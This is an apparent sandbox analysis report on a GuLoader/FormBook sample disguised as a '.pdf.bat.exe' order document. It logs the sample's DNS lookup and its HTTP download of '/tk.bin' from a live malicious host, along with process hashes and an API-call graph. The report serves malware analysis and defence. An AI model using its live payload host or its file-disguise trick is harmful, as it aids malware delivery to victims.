                                            Nov 25, 2024 10:27:37.107690096 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.110584021 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.110636950 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.110699892 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.110744953 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.113656998 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.113729000 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.113755941 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.113811970 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.116730928 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.116775036 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.116976023 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.117014885 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.119808912 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.119853020 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.119911909 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.119950056 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.122838974 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.122879982 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.122951984 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.123012066 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.125979900 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.126027107 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.126041889 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.126079082 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.129000902 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.129044056 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.129106045 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.129160881 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.132020950 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.132097960 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.132153034 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.132200003 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.135138988 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.135183096 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.135322094 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.135360003 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.138173103 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.138226986 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.138531923 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.138571024 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.141311884 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.141357899 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.141444921 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.141486883 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.144419909 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.144458055 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.144486904 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.144525051 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.147402048 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.147453070 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.147520065 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.147559881 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.150422096 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.150471926 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.150594950 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.150640965 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.153594017 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.153655052 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.153666019 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.153707027 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.156517029 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.156575918 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.272984982 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.273020983 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.273051977 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.273068905 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.274029016 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.274075985 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.274122953 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.274168015 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.276400089 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.276451111 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.277268887 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.277313948 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.277354002 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.277394056 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.279650927 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.279707909 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.279743910 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.279784918 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.282001019 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.282052040 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.282085896 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.282129049 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.284392118 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.284446001 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.284501076 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.284547091 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.286676884 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.286747932 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.286817074 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.286870956 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.289010048 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.289072990 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.289104939 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.289155006 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.291342020 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.291388988 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.291449070 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.291502953 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.293657064 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.293704033 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.293823004 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.293874025 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.296148062 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.296159029 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.296216011 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.298358917 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.298418999 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.298451900 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.298496962 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.300666094 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.300715923 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.300776958 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.300822973 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.303184032 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.303241968 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.303251982 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.303299904 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.305366039 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.305438995 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.305504084 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.305552006 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.307818890 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.307882071 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.307917118 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.307961941 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.310117960 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.310228109 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.310250998 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.310269117 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.312331915 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.312392950 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.312453032 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.312498093 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.314699888 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.314749956 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.314821005 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.314863920 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.317004919 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.317056894 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.317071915 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.317114115 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.319366932 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.319425106 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.319482088 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.319524050 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.321708918 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.321721077 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.321773052 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.324047089 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.324106932 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.324141026 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.324188948 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.326348066 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.326392889 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.326468945 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.326509953 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.328752995 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.328804016 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.328834057 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.328872919 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.331024885 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.331104994 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.331135035 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.331176996 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.333391905 CET8049813103.83.194.50192.168.2.4
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Nov 25, 2024 10:27:33.960083961 CET | 54599 | 53 | 192.168.2.4 | 1.1.1.1
                                            Nov 25, 2024 10:27:34.951534033 CET | 54599 | 53 | 192.168.2.4 | 1.1.1.1
                                            Nov 25, 2024 10:27:34.974417925 CET | 53 | 54599 | 1.1.1.1 | 192.168.2.4
                                            Nov 25, 2024 10:27:35.088555098 CET | 53 | 54599 | 1.1.1.1 | 192.168.2.4
                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                            Nov 25, 2024 10:27:33.960083961 CET | 192.168.2.4 | 1.1.1.1 | 0xf49 | Standard query (0) | enechado.ru.com | A (IP address) | IN (0x0001) | false
                                            Nov 25, 2024 10:27:34.951534033 CET | 192.168.2.4 | 1.1.1.1 | 0xf49 | Standard query (0) | enechado.ru.com | A (IP address) | IN (0x0001) | false
                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                            Nov 25, 2024 10:27:34.974417925 CET | 1.1.1.1 | 192.168.2.4 | 0xf49 | No error (0) | enechado.ru.com | | 103.83.194.50 | A (IP address) | IN (0x0001) | false
                                            Nov 25, 2024 10:27:35.088555098 CET | 1.1.1.1 | 192.168.2.4 | 0xf49 | No error (0) | enechado.ru.com | | 103.83.194.50 | A (IP address) | IN (0x0001) | false
                                            • enechado.ru.com
                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            0 | 192.168.2.4 | 49813 | 103.83.194.50 | 80 | 2648 | C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Nov 25, 2024 10:27:35.099689960 CET | 166 | OUT | GET /tk.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: enechado.ru.com
                                            Cache-Control: no-cache
                                            Nov 25, 2024 10:27:36.431057930 CET | 1236 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 25 Nov 2024 09:27:36 GMT
                                            Server: Apache
                                            Last-Modified: Mon, 25 Nov 2024 02:40:55 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 289856
                                            Content-Type: application/octet-stream



                                            Target ID:0
                                            Start time:04:25:59
                                            Start date:25/11/2024
                                            Path:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
                                            Imagebase:0x400000
                                            File size:992'543 bytes
                                            MD5 hash:F669EAF2B985A35F3B1BF21D73B7CAF2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2572461469.0000000004B5D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:5
                                            Start time:04:27:26
                                            Start date:25/11/2024
                                            Path:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
                                            Imagebase:0x400000
                                            File size:992'543 bytes
                                            MD5 hash:F669EAF2B985A35F3B1BF21D73B7CAF2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:6
                                            Start time:04:27:54
                                            Start date:25/11/2024
                                            Path:C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe"
                                            Imagebase:0x7d0000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Target ID:7
                                            Start time:04:27:56
                                            Start date:25/11/2024
                                            Path:C:\Windows\SysWOW64\sdchange.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                            Imagebase:0x9a0000
                                            File size:40'960 bytes
                                            MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false


                                              Execution Graph

                                              Execution Coverage:18.5%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:19.6%
                                              Total number of Nodes:1567
                                              Total number of Limit Nodes:35
17 API calls 5012 40379c DeleteFileW 5011->5012 5013 4037a9 CopyFileW 5012->5013 5019 40376b 5012->5019 5013->5019 5014 4037f2 5016 40604a 36 API calls 5014->5016 5015 40604a 36 API calls 5015->5019 5016->5017 5121 40389a 5017->5121 5018 4062a6 17 API calls 5018->5019 5019->5011 5019->5014 5019->5015 5019->5018 5021 4037dd CloseHandle 5019->5021 5130 40586d CreateProcessW 5019->5130 5021->5019 5022->4947 5023->4949 5025 406518 5 API calls 5024->5025 5026 403334 5025->5026 5027 40333e 5026->5027 5028 405b59 3 API calls 5026->5028 5027->4954 5029 403346 5028->5029 5030 405838 2 API calls 5029->5030 5031 40334c 5030->5031 5133 405da9 5031->5133 5137 405d7a GetFileAttributesW CreateFileW 5034->5137 5036 402f1d 5055 402f2d 5036->5055 5138 406284 lstrcpynW 5036->5138 5038 402f43 5039 405ba5 2 API calls 5038->5039 5040 402f49 5039->5040 5139 406284 lstrcpynW 5040->5139 5042 402f54 GetFileSize 5043 403050 5042->5043 5061 402f6b 5042->5061 5140 402e79 5043->5140 5045 403059 5047 403089 GlobalAlloc 5045->5047 5045->5055 5152 403311 SetFilePointer 5045->5152 5046 4032fb ReadFile 5046->5061 5151 403311 SetFilePointer 5047->5151 5049 4030bc 5051 402e79 6 API calls 5049->5051 5051->5055 5052 403072 5056 4032fb ReadFile 5052->5056 5053 4030a4 5054 403116 35 API calls 5053->5054 5059 4030b0 5054->5059 5055->4961 5057 40307d 5056->5057 5057->5047 5057->5055 5058 402e79 6 API calls 5058->5061 5059->5055 5059->5059 5060 4030ed SetFilePointer 5059->5060 5060->5055 5061->5043 5061->5046 5061->5049 5061->5055 5061->5058 5063 40665e 5 API calls 5062->5063 5064 403988 5063->5064 5065 4039a0 5064->5065 5066 40398e 5064->5066 5067 406152 3 API calls 5065->5067 5165 4061cb wsprintfW 5066->5165 5068 4039d0 5067->5068 5070 4039ef lstrcatW 5068->5070 5072 406152 3 API calls 5068->5072 5071 40399e 5070->5071 5157 403c4a 5071->5157 5072->5070 5075 405c61 18 API calls 5076 403a21 5075->5076 5077 403ab5 5076->5077 5079 406152 3 API calls 5076->5079 5078 405c61 18 API calls 5077->5078 5080 403abb 
5078->5080 5081 403a53 5079->5081 5082 403acb LoadImageW 5080->5082 5083 4062a6 17 API calls 5080->5083 5081->5077 5086 403a74 lstrlenW 5081->5086 5089 405b86 CharNextW 5081->5089 5084 403b71 5082->5084 5085 403af2 RegisterClassW 5082->5085 5083->5082 5088 40140b 2 API calls 5084->5088 5087 403b28 SystemParametersInfoW CreateWindowExW 5085->5087 5117 403b7b 5085->5117 5090 403a82 lstrcmpiW 5086->5090 5091 403aa8 5086->5091 5087->5084 5092 403b77 5088->5092 5093 403a71 5089->5093 5090->5091 5094 403a92 GetFileAttributesW 5090->5094 5095 405b59 3 API calls 5091->5095 5097 403c4a 18 API calls 5092->5097 5092->5117 5093->5086 5096 403a9e 5094->5096 5098 403aae 5095->5098 5096->5091 5099 405ba5 2 API calls 5096->5099 5100 403b88 5097->5100 5166 406284 lstrcpynW 5098->5166 5099->5091 5102 403b94 ShowWindow 5100->5102 5103 403c17 5100->5103 5104 4065ee 3 API calls 5102->5104 5105 4053bf 5 API calls 5103->5105 5106 403bac 5104->5106 5107 403c1d 5105->5107 5108 403bba GetClassInfoW 5106->5108 5111 4065ee 3 API calls 5106->5111 5109 403c21 5107->5109 5110 403c39 5107->5110 5113 403be4 DialogBoxParamW 5108->5113 5114 403bce GetClassInfoW RegisterClassW 5108->5114 5115 40140b 2 API calls 5109->5115 5109->5117 5112 40140b 2 API calls 5110->5112 5111->5108 5112->5117 5116 40140b 2 API calls 5113->5116 5114->5113 5115->5117 5116->5117 5117->5017 5118->4964 5119->4998 5120->4965 5122 4038b2 5121->5122 5123 4038a4 CloseHandle 5121->5123 5168 4038df 5122->5168 5123->5122 5126 405996 67 API calls 5127 4036cd OleUninitialize 5126->5127 5127->4974 5127->4975 5128->5008 5129->5019 5131 4058a0 CloseHandle 5130->5131 5132 4058ac 5130->5132 5131->5132 5132->5019 5134 405db6 GetTickCount GetTempFileNameW 5133->5134 5135 403357 5134->5135 5136 405dec 5134->5136 5135->4954 5136->5134 5136->5135 5137->5036 5138->5038 5139->5042 5141 402e82 5140->5141 5142 402e9a 5140->5142 5143 402e92 5141->5143 5144 402e8b DestroyWindow 5141->5144 5145 402ea2 5142->5145 5146 402eaa GetTickCount 5142->5146 
5143->5045 5144->5143 5153 40669a 5145->5153 5147 402eb8 CreateDialogParamW ShowWindow 5146->5147 5148 402edb 5146->5148 5147->5148 5148->5045 5151->5053 5152->5052 5154 4066b7 PeekMessageW 5153->5154 5155 402ea8 5154->5155 5156 4066ad DispatchMessageW 5154->5156 5155->5045 5156->5154 5158 403c5e 5157->5158 5167 4061cb wsprintfW 5158->5167 5160 403ccf 5161 403d03 18 API calls 5160->5161 5163 403cd4 5161->5163 5162 4039ff 5162->5075 5163->5162 5164 4062a6 17 API calls 5163->5164 5164->5163 5165->5071 5166->5077 5167->5160 5169 4038ed 5168->5169 5170 4038b7 5169->5170 5171 4038f2 FreeLibrary GlobalFree 5169->5171 5170->5126 5171->5170 5171->5171 5269 402259 5270 402c41 17 API calls 5269->5270 5271 40225f 5270->5271 5272 402c41 17 API calls 5271->5272 5273 402268 5272->5273 5274 402c41 17 API calls 5273->5274 5275 402271 5274->5275 5276 4065c7 2 API calls 5275->5276 5277 40227a 5276->5277 5278 40228b lstrlenW lstrlenW 5277->5278 5282 40227e 5277->5282 5279 4052ec 24 API calls 5278->5279 5281 4022c9 SHFileOperationW 5279->5281 5280 4052ec 24 API calls 5283 402286 5280->5283 5281->5282 5281->5283 5282->5280 5172 40175c 5173 402c41 17 API calls 5172->5173 5174 401763 5173->5174 5175 405da9 2 API calls 5174->5175 5176 40176a 5175->5176 5177 405da9 2 API calls 5176->5177 5177->5176 5291 401d5d GetDlgItem GetClientRect 5292 402c41 17 API calls 5291->5292 5293 401d8f LoadImageW SendMessageW 5292->5293 5294 402ac5 5293->5294 5295 401dad DeleteObject 5293->5295 5295->5294 5296 4022dd 5297 4022e4 5296->5297 5300 4022f7 5296->5300 5298 4062a6 17 API calls 5297->5298 5299 4022f1 5298->5299 5301 4058ea MessageBoxIndirectW 5299->5301 5301->5300 5302 405260 5303 405270 5302->5303 5304 405284 5302->5304 5305 405276 5303->5305 5306 4052cd 5303->5306 5307 40528c IsWindowVisible 5304->5307 5313 4052a3 5304->5313 5310 404247 SendMessageW 5305->5310 5309 4052d2 CallWindowProcW 5306->5309 5307->5306 5308 405299 5307->5308 5315 404bb6 SendMessageW 5308->5315 5312 405280 5309->5312 
5310->5312 5313->5309 5320 404c36 5313->5320 5316 404c15 SendMessageW 5315->5316 5317 404bd9 GetMessagePos ScreenToClient SendMessageW 5315->5317 5319 404c0d 5316->5319 5318 404c12 5317->5318 5317->5319 5318->5316 5319->5313 5329 406284 lstrcpynW 5320->5329 5322 404c49 5330 4061cb wsprintfW 5322->5330 5324 404c53 5325 40140b 2 API calls 5324->5325 5326 404c5c 5325->5326 5331 406284 lstrcpynW 5326->5331 5328 404c63 5328->5306 5329->5322 5330->5324 5331->5328 5332 401563 5333 402a6b 5332->5333 5336 4061cb wsprintfW 5333->5336 5335 402a70 5336->5335 4490 4023e4 4491 402c41 17 API calls 4490->4491 4492 4023f6 4491->4492 4493 402c41 17 API calls 4492->4493 4494 402400 4493->4494 4507 402cd1 4494->4507 4497 402c41 17 API calls 4500 40242e lstrlenW 4497->4500 4498 402438 4499 402444 4498->4499 4511 402c1f 4498->4511 4502 402463 RegSetValueExW 4499->4502 4514 403116 4499->4514 4500->4498 4504 402479 RegCloseKey 4502->4504 4506 40288b 4504->4506 4508 402cec 4507->4508 4535 40611f 4508->4535 4512 4062a6 17 API calls 4511->4512 4513 402c34 4512->4513 4513->4499 4515 40312f 4514->4515 4516 40315a 4515->4516 4549 403311 SetFilePointer 4515->4549 4539 4032fb 4516->4539 4520 403177 GetTickCount 4531 40318a 4520->4531 4521 40329b 4522 40329f 4521->4522 4526 4032b7 4521->4526 4523 4032fb ReadFile 4522->4523 4529 403285 4523->4529 4524 4032fb ReadFile 4524->4526 4525 4032fb ReadFile 4525->4531 4526->4524 4527 405e2c WriteFile 4526->4527 4526->4529 4527->4526 4529->4502 4530 4031f0 GetTickCount 4530->4531 4531->4525 4531->4529 4531->4530 4532 403219 MulDiv wsprintfW 4531->4532 4534 405e2c WriteFile 4531->4534 4542 4067df 4531->4542 4533 4052ec 24 API calls 4532->4533 4533->4531 4534->4531 4536 40612e 4535->4536 4537 402410 4536->4537 4538 406139 RegCreateKeyExW 4536->4538 4537->4497 4537->4498 4537->4506 4538->4537 4540 405dfd ReadFile 4539->4540 4541 403165 4540->4541 4541->4520 4541->4521 4541->4529 4543 406804 4542->4543 4544 40680c 4542->4544 4543->4531 4544->4543 4545 406893 
